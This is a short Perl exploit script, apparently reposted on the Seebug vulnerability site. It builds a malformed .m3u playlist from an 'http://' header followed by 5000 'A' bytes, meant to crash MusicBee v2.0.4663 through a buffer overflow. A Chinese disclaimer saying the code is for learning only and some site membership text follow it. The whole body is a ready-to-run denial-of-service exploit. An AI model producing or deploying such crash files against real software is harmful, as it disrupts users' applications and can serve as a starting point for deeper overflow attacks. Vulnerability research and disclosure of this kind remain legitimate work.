#!/usr/bin/perl # # # ############################################################# # # Exploit Title: MusicBee v2.0.4663 .M3U Denial of Service Exploit # Date: 2013/6/19 # Exploit Author: Chako # Vendor Homepage: http://getmusicbee.com/ # Version: v2.0.4663 # Tested on: Windows XP SP3 English ############################################################# $HEADER = "http://"; #$BOF = "\x41" x 3740; $BOF = "\x41" x 5000; open(myfile, '> MusicBee _EXP.m3u'); print myfile $HEADER.$BOF;
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论